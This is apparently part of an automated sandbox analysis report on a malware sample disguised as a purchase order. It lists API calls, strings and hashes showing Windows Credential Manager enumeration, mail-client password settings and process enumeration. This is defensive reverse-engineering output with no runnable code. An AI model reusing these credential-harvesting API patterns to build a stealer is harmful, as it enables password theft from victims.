                                                                                                      • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                                                                      • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                      • API String ID: 2449869053-232097475
                                                                                                      • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                      • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                      • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                      • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                      APIs
                                                                                                      • sprintf.MSVCRT ref: 0040957B
                                                                                                      • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                        • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                        • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                        • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                        • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                      • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                      • sprintf.MSVCRT ref: 004095EB
                                                                                                      • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                      • memset.MSVCRT ref: 0040961C
                                                                                                      • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                      • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                      • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                      • String ID: caption$dialog_%d$menu_%d
                                                                                                      • API String ID: 3259144588-3822380221
                                                                                                      • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                      • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                      • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                                                                      • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                      APIs
                                                                                                        • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                      • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                      • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                      • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                      • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                      • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                      • API String ID: 2449869053-4258758744
                                                                                                      • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                      • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                      • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                      • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                      APIs
                                                                                                      • wcsstr.MSVCRT ref: 0040426A
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                      • strchr.MSVCRT ref: 004042F6
                                                                                                      • strlen.MSVCRT ref: 0040430A
                                                                                                      • sprintf.MSVCRT ref: 0040432B
                                                                                                      • strchr.MSVCRT ref: 0040433C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                      • String ID: %s@gmail.com$www.google.com
                                                                                                      • API String ID: 3866421160-4070641962
                                                                                                      • Opcode ID: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                      • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                      • Opcode Fuzzy Hash: 1edbde93058757da684035df5ff447e14cead6821ca445e74965780bbbdd419f
                                                                                                      • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                      • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                      • API String ID: 2360744853-2229823034
                                                                                                      • Opcode ID: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                      • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                                      • Opcode Fuzzy Hash: b98e279298427c20d80c092d066d5e90b39ad4a4c54a31d4adca6ea1b8d7f224
                                                                                                      • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                                      APIs
                                                                                                      • strchr.MSVCRT ref: 004100E4
                                                                                                      • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                      • _mbscat.MSVCRT ref: 0041014D
                                                                                                      • memset.MSVCRT ref: 00410129
                                                                                                        • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                        • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                      • memset.MSVCRT ref: 00410171
                                                                                                      • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                      • _mbscat.MSVCRT ref: 00410197
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                      • String ID: \systemroot
                                                                                                      • API String ID: 912701516-1821301763
                                                                                                      • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                      • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                      • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                      • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                      APIs
                                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                      • wcslen.MSVCRT ref: 0040874A
                                                                                                      • wcsncmp.MSVCRT ref: 00408794
                                                                                                      • memset.MSVCRT ref: 0040882A
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                      • wcschr.MSVCRT ref: 0040889F
                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                      • String ID: J$Microsoft_WinInet
                                                                                                      • API String ID: 3318079752-260894208
                                                                                                      • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                      • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                      • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                      • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                      • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                                      • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                                      • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                        • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                      • API String ID: 888011440-2039793938
                                                                                                      • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                      • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                      • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                      • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                      • strchr.MSVCRT ref: 0040327B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringstrchr
                                                                                                      • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                      • API String ID: 1348940319-1729847305
                                                                                                      • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                      • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                      • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                      • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                      • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                      • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                      • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                      • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                      • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                      • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004094C8
                                                                                                      • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                      • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                      • memset.MSVCRT ref: 0040950C
                                                                                                      • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                      • _strcmpi.MSVCRT ref: 00409531
                                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                      • String ID: sysdatetimepick32
                                                                                                      • API String ID: 3411445237-4169760276
                                                                                                      • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                      • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                      • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                      • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                      • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                      • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                      • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                      • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                      • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                      • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                      • String ID:
                                                                                                      • API String ID: 3642520215-0
                                                                                                      • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                      • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                      • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                      • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                      • GetDC.USER32(00000000), ref: 004072FB
                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                      • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                      • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                      • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                      • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 1999381814-0
                                                                                                      • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                      • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                      • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                      • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                      • API String ID: 1297977491-3883738016
                                                                                                      • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                      • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                      • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                      • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                      APIs
                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: gj
                                                                                                      • API String ID: 438689982-4203073231
                                                                                                      • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                      • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                      • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                      • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm$__aullrem
                                                                                                      • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                      • API String ID: 643879872-978417875
                                                                                                      • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                      • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                      • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                      • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040810E
                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
